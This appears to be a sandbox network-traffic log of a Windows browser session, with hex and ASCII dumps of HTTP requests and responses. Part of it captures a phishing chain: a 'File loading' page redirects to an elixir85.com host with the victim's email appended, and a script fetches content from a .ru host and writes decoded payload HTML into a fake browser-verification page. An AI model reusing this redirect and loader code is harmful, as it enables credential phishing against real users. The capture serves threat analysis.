                                                        Cache-Control: public, max-age=0, must-revalidate
                                                        referrer-policy: strict-origin-when-cross-origin
                                                        x-content-type-options: nosniff
                                                        x-robots-tag: noindex
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zFZ505fl15kOAN6vRO4kFXxLlkuM2J1z1uS7CPxcjWIvbuHMaXPh4q1%2FE%2Bzw9McLWKJanVqXFwKlc0Ka0CcfgpxTbUVrTZqJCiAlZniY8aqhms9MFhau9zmrEnQE0Sfb5p7buMOFgNin760wfmEALQKxikLTgBooGn1UDLw1XqN5xA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 89d9276d19560fa4-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:39 UTC1369INData Raw: 35 62 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6c 6f 61 64 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 2f 2f 20 46 75 6e 63 74 69 6f 6e 20 74 6f 20 67 65 74 20 74 68 65 20 76 61 6c 75 65 20 6f 66 20 61 20 70 61 72 61 6d 65 74 65 72 20 66 72 6f 6d 20 74 68 65 20 55 52
                                                        Data Ascii: 5bd<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>File loading</title> <script> // Function to get the value of a parameter from the UR
                                                        2024-07-03 19:06:39 UTC107INData Raw: 57 41 69 2e 65 6c 69 78 69 72 38 35 2e 63 6f 6d 2f 52 66 57 41 69 2f 23 58 27 20 2b 20 65 6d 61 69 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                        Data Ascii: WAi.elixir85.com/RfWAi/#X' + email; }, 1000); } </script></head><body></html>
                                                        2024-07-03 19:06:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.549737104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:40 UTC720OUTGET /RfWAi/ HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:48 UTC1009INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:06:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: no-cache, private
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WSFIx1c5%2FYy3rzOy5OlFIXWPoMF9TPeGh0N6LLtmTbODWpT9jAH6olL3qkZ7KEAx12zMWJkYGz%2FR%2FmY5FCF8mefZdh3yp3%2BG6lIoQRs04mv%2BnbpJgNYDWA9DrX8PCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik85WmNPeGFtNzFCRmZENHVOYmliOEE9PSIsInZhbHVlIjoiaFdXZDIrMXFxbGxvSHN0UzdvN3hGdHRETGl1MFR3R2h5MFVjMHhiSktjV01GeWsrTHgrT3lwMmpWY00vcGQzaW4yLy8rQ1dDNmQ2VW80WXpZT3VhWVlTUTA2SlExYTdpMVBhT1hkRVdVYVFlMG4rMlh3SUJXVlZJa2kyVVUrTk0iLCJtYWMiOiJhMmRjNTNjM2UyMmI3NjcyMmY0YTE5MjZlOThjMmEyZWViMWQ0MGUzOGU0ZDMwNzk0MDQwNDIwMzVkNzcxODU4IiwidGFnIjoiIn0%3D; expires=Wed, 03-Jul-2024 21:06:48 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                        2024-07-03 19:06:48 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 78 70 63 6e 46 34 55 6d 35 6b 4d 6a 42 52 61 69 39 55 63 6a 52 56 4e 48 67 35 5a 31 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4d 56 52 45 4d 47 34 79 64 44 68 68 62 55 68 4b 5a 7a 56 5a 62 6d 78 58 4b 30 70 48 64 6e 46 6d 4b 7a 5a 56 57 6c 46 34 51 31 4e 75 4d 46 52 75 64 6d 6c 4a 65 57 56 72 59 6d 51 76 4d 6d 70 78 4f 46 42 30 52 6d 31 6c 53 46 4a 32 52 6c 5a 75 4f 54 56 72 61 48 4e 6e 5a 7a 5a 51 62 43 38 35 63 32 78 52 59 56 5a 48 4e 55 70 31 55 6c 4e 4f 56 44 52 49 51 79 38 33 53 33 52 61 4d 6d 4d 30 63 46 56 72 59 6c 68 61 64 6c 56 46 62 54 64 51 56 30 5a 49 52 7a 64 4a 53 48 5a 57 62 6a 56 51 53 31 42 4d 53 6e 6c 77 62 31 49
                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkxpcnF4Um5kMjBRai9UcjRVNHg5Z1E9PSIsInZhbHVlIjoiMVREMG4ydDhhbUhKZzVZbmxXK0pHdnFmKzZVWlF4Q1NuMFRudmlJeWVrYmQvMmpxOFB0Rm1lSFJ2RlZuOTVraHNnZzZQbC85c2xRYVZHNUp1UlNOVDRIQy83S3RaMmM0cFVrYlhadlVFbTdQV0ZIRzdJSHZWbjVQS1BMSnlwb1I
                                                        2024-07-03 19:06:48 UTC1369INData Raw: 31 37 66 34 0d 0a 3c 73 63 72 69 70 74 3e 66 65 74 63 68 28 27 68 74 74 70 73 3a 2f 2f 5a 49 43 68 44 2e 36 67 6e 69 75 36 38 2e 72 75 2f 64 62 58 4c 44 51 74 70 44 53 52 42 75 42 68 56 4f 54 57 4b 77 58 78 6f 42 59 77 55 53 4a 54 55 45 41 50 48 45 54 54 4e 4f 46 59 54 44 41 48 56 4f 4b 4a 55 52 4d 57 55 46 4c 51 50 56 4d 42 45 53 58 56 4f 53 52 56 42 41 46 42 44 4e 27 2c 20 7b 0d 0a 6d 65 74 68 6f 64 3a 20 22 47 45 54 22 2c 0d 0a 7d 29 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 7b 0d 0a 72 65 74 75 72 6e 20 72 65 73 70 6f 6e 73 65 2e 74 65 78 74 28 29 0d 0a 7d 29 2e 74 68 65 6e 28 74 65 78 74 20 3d 3e 20 7b 0d 0a 69 66 28 74 65 78 74 20 3d 3d 20 30 29 7b 20 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d
                                                        Data Ascii: 17f4<script>fetch('https://ZIChD.6gniu68.ru/dbXLDQtpDSRBuBhVOTWKwXxoBYwUSJTUEAPHETTNOFYTDAHVOKJURMWUFLQPVMBESXVOSRVBAFBDN', {method: "GET",}).then(response => {return response.text()}).then(text => {if(text == 0){ document.write(decodeURICom
                                                        2024-07-03 19:06:48 UTC1369INData Raw: 56 79 5a 57 30 37 66 51 30 4b 66 51 30 4b 49 31 56 77 56 57 39 77 59 33 42 79 59 57 4d 67 63 48 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 6a 41 37 62 57 46 79 5a 32 6c 75 4c 57 4a 76 64 48 52 76 62 54 6f 78 63 6d 56 74 4f 33 30 4e 43 69 4e 56 63 46 56 76 63 47 4e 77 63 6d 46 6a 4c 6d 4e 76 62 6e 52 68 61 57 35 6c 63 6e 74 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 74 77 59 57 52 6b 61 57 35 6e 4c 58 4a 70 5a 32 68 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 77 59 57 52 6b 61 57 35 6e 4c 57 78 6c 5a 6e 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 32 31 68 63 6d 64 70 62 69 31 79 61 57 64 6f 64 44 6f 67 59
                                                        Data Ascii: VyZW07fQ0KfQ0KI1VwVW9wY3ByYWMgcHttYXJnaW4tdG9wOjA7bWFyZ2luLWJvdHRvbToxcmVtO30NCiNVcFVvcGNwcmFjLmNvbnRhaW5lcnt3aWR0aDogMTAwJTtwYWRkaW5nLXJpZ2h0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTtwYWRkaW5nLWxlZnQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO21hcmdpbi1yaWdodDogY
                                                        2024-07-03 19:06:48 UTC1369INData Raw: 75 4c 69 42 54 62 32 31 6c 64 47 6c 74 5a 58 4d 67 61 58 51 6d 49 7a 41 7a 4f 54 74 7a 49 47 4a 31 61 57 78 30 49 47 39 75 49 47 4e 68 64 47 46 7a 64 48 4a 76 63 47 68 6c 4c 6a 77 76 5a 47 6c 32 50 69 41 74 4c 54 34 4b 50 43 39 6f 5a 57 46 6b 50 67 30 4b 44 51 6f 38 59 6d 39 6b 65 53 42 7a 64 48 6c 73 5a 54 30 69 5a 6d 39 75 64 43 31 6d 59 57 31 70 62 48 6b 36 49 47 46 79 61 57 46 73 4c 43 42 7a 59 57 35 7a 4c 58 4e 6c 63 6d 6c 6d 4f 32 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 59 32 39 73 62 33 49 36 49 43 4e 6d 5a 6d 59 37 59 32 39 73 62 33 49 36 49 43 4d 77 4d 44 41 37 63 47 46 6b 5a 47 6c 75 5a 7a 6f 67 4d 6a 42 77 65 44 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 44 45 34 63 48 67 37 62 33 5a 6c 63 6e 4e 6a 63 6d 39 73 62 43 31 69 5a 57 68 68 64 6d
                                                        Data Ascii: uLiBTb21ldGltZXMgaXQmIzAzOTtzIGJ1aWx0IG9uIGNhdGFzdHJvcGhlLjwvZGl2PiAtLT4KPC9oZWFkPg0KDQo8Ym9keSBzdHlsZT0iZm9udC1mYW1pbHk6IGFyaWFsLCBzYW5zLXNlcmlmO2JhY2tncm91bmQtY29sb3I6ICNmZmY7Y29sb3I6ICMwMDA7cGFkZGluZzogMjBweDtmb250LXNpemU6IDE4cHg7b3ZlcnNjcm9sbC1iZWhhdm
                                                        2024-07-03 19:06:48 UTC1369INData Raw: 49 43 30 74 50 67 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 67 61 57 51 39 49 6b 35 52 55 32 70 46 53 6c 56 31 62 56 55 69 50 67 30 4b 56 6d 56 79 61 57 5a 35 61 57 35 6e 49 48 6c 76 64 58 49 67 59 6e 4a 76 64 33 4e 6c 63 69 42 30 62 79 42 7a 59 57 5a 6c 5a 33 56 68 63 6d 51 67 65 57 39 31 63 69 42 6a 62 32 35 75 5a 57 4e 30 61 57 39 75 4c 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 49 53 30 74 49 46 52 6f 5a 53 42 7a 64 47 46 79 64 47 6c 75 5a 79 42 77 62 32 6c 75 64 43 42 76 5a 69 42 68 62 47 77 67 59 57 4e 6f 61 57 56 32 5a 57 31 6c 62 6e 51 67 61 58 4d 67 5a 47 56 7a 61 58 4a 6c 4c 69 41 74 4c 54 34 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 52 70 64 6a 34
                                                        Data Ascii: IC0tPgo8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnRlciIgaWQ9Ik5RU2pFSlV1bVUiPg0KVmVyaWZ5aW5nIHlvdXIgYnJvd3NlciB0byBzYWZlZ3VhcmQgeW91ciBjb25uZWN0aW9uLg0KPC9kaXY+DQo8IS0tIFRoZSBzdGFydGluZyBwb2ludCBvZiBhbGwgYWNoaWV2ZW1lbnQgaXMgZGVzaXJlLiAtLT4KPC9mb3JtPg0KPC9kaXY+DQo8L2Rpdj4
                                                        2024-07-03 19:06:48 UTC664INData Raw: 32 56 7a 63 79 63 70 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 73 62 32 4e 68 64 47 6c 76 62 69 35 79 5a 57 78 76 59 57 51 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 66 51 30 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 6b 59 58 52 68 57 79 64 7a 64 47 46 30 64 58 4d 6e 58 53 41 39 50 53 41 6e 5a 58 4a 79 62 33 49 6e 4b 58 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 64 32 6c 75 5a 47 39 33 4c 6d 78 76 59 32 46 30 61 57 39 75 4c 6d 68 79 5a 57 59 67 50 53 41 6e 4c 33 4e 72 65 47 70 73 61 6e 64 36 65 47 46 31 64 6b 46 75 65 6a 4d 79 55 45 39 57 62 32 52 6a 5a 47 52 58 65 57 46 50 55 57 4e 59 61 47 74 36 63 58 56 74 59 58 4e 75 59 6d 6b 2f 59 58 70 68 61 32 74 33 53 45 35 42 57 6b 74 48 55 56 42 48 56 6b 6c 4d 51 6c 5a 5a 55 6b 70 58 55 55 64 49
                                                        Data Ascii: 2Vzcycpew0KICAgICAgICBsb2NhdGlvbi5yZWxvYWQoKTsNCiAgICAgICAgfQ0KICAgICAgICBpZihkYXRhWydzdGF0dXMnXSA9PSAnZXJyb3InKXsNCiAgICAgICAgd2luZG93LmxvY2F0aW9uLmhyZWYgPSAnL3NreGpsand6eGF1dkFuejMyUE9Wb2RjZGRXeWFPUWNYaGt6cXVtYXNuYmk/YXpha2t3SE5BWktHUVBHVklMQlZZUkpXUUdI
                                                        2024-07-03 19:06:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13192.168.2.54973920.190.159.4443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:40 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                        Connection: Keep-Alive
                                                        Content-Type: application/soap+xml
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                        Content-Length: 4775
                                                        Host: login.live.com
                                                        2024-07-03 19:06:40 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                        2024-07-03 19:06:41 UTC654INHTTP/1.1 200 OK
                                                        Cache-Control: no-store, no-cache
                                                        Pragma: no-cache
                                                        Content-Type: application/soap+xml; charset=utf-8
                                                        Expires: Wed, 03 Jul 2024 19:05:41 GMT
                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                        FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30275.14
                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                        x-ms-route-info: C561_BAY
                                                        x-ms-request-id: c6594f4c-70f0-44b8-980e-0c74857fbf84
                                                        PPServer: PPV: 30 H: PH1PEPF00012039 V: 0
                                                        X-Content-Type-Options: nosniff
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-XSS-Protection: 1; mode=block
                                                        Date: Wed, 03 Jul 2024 19:06:41 GMT
                                                        Connection: close
                                                        Content-Length: 11390
                                                        2024-07-03 19:06:41 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.549740184.28.90.27443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:41 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: fs.microsoft.com
                                                        2024-07-03 19:06:41 UTC466INHTTP/1.1 200 OK
                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                        Content-Type: application/octet-stream
                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                        Server: ECAcc (lpl/EF06)
                                                        X-CID: 11
                                                        X-Ms-ApiVersion: Distribute 1.2
                                                        X-Ms-Region: prod-neu-z1
                                                        Cache-Control: public, max-age=75743
                                                        Date: Wed, 03 Jul 2024 19:06:41 GMT
                                                        Connection: close
                                                        X-CID: 2


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.549741172.66.45.74433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:41 UTC382OUTGET /favicon.ico HTTP/1.1
                                                        Host: ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:41 UTC783INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:06:41 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=0, must-revalidate
                                                        referrer-policy: strict-origin-when-cross-origin
                                                        x-content-type-options: nosniff
                                                        x-robots-tag: noindex
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yiyyEyPeA5hVh7nQXGtE%2B9l2H0Ku3uFHvYCpCPKSu%2BucJjt8EQnCRHjY0erv7HzV%2BIibdOLzCAKRkOpFbyMtjG7eIdwBA6JT2DF3gV3NlT8YnuaMRbFQkUvQhxBMAJononL2YOyMAJSivXcuKpw7J3noFHFBYTqlwG7ozmaHRiskBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 89d92779aaf319f3-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:41 UTC1369INData Raw: 35 62 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6c 6f 61 64 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 2f 2f 20 46 75 6e 63 74 69 6f 6e 20 74 6f 20 67 65 74 20 74 68 65 20 76 61 6c 75 65 20 6f 66 20 61 20 70 61 72 61 6d 65 74 65 72 20 66 72 6f 6d 20 74 68 65 20 55 52
                                                        Data Ascii: 5bd<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>File loading</title> <script> // Function to get the value of a parameter from the UR
                                                        2024-07-03 19:06:41 UTC107INData Raw: 57 41 69 2e 65 6c 69 78 69 72 38 35 2e 63 6f 6d 2f 52 66 57 41 69 2f 23 58 27 20 2b 20 65 6d 61 69 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                        Data Ascii: WAi.elixir85.com/RfWAi/#X' + email; }, 1000); } </script></head><body></html>
                                                        2024-07-03 19:06:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.549742184.28.90.27443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:42 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                        Range: bytes=0-2147483646
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: fs.microsoft.com
                                                        2024-07-03 19:06:42 UTC514INHTTP/1.1 200 OK
                                                        ApiVersion: Distribute 1.1
                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                        Content-Type: application/octet-stream
                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                        Server: ECAcc (lpl/EF06)
                                                        X-CID: 11
                                                        X-Ms-ApiVersion: Distribute 1.2
                                                        X-Ms-Region: prod-weu-z1
                                                        Cache-Control: public, max-age=75752
                                                        Date: Wed, 03 Jul 2024 19:06:42 GMT
                                                        Content-Length: 55
                                                        Connection: close
                                                        X-CID: 2
                                                        2024-07-03 19:06:42 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17192.168.2.54974440.115.3.253443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:43 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 4d 4c 6b 6a 41 35 6a 52 46 55 75 50 65 74 46 51 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 61 64 39 63 63 32 37 39 37 61 38 65 30 30 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 304MS-CV: MLkjA5jRFUuPetFQ.1Context: 5ad9cc2797a8e00
                                                        2024-07-03 19:06:43 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
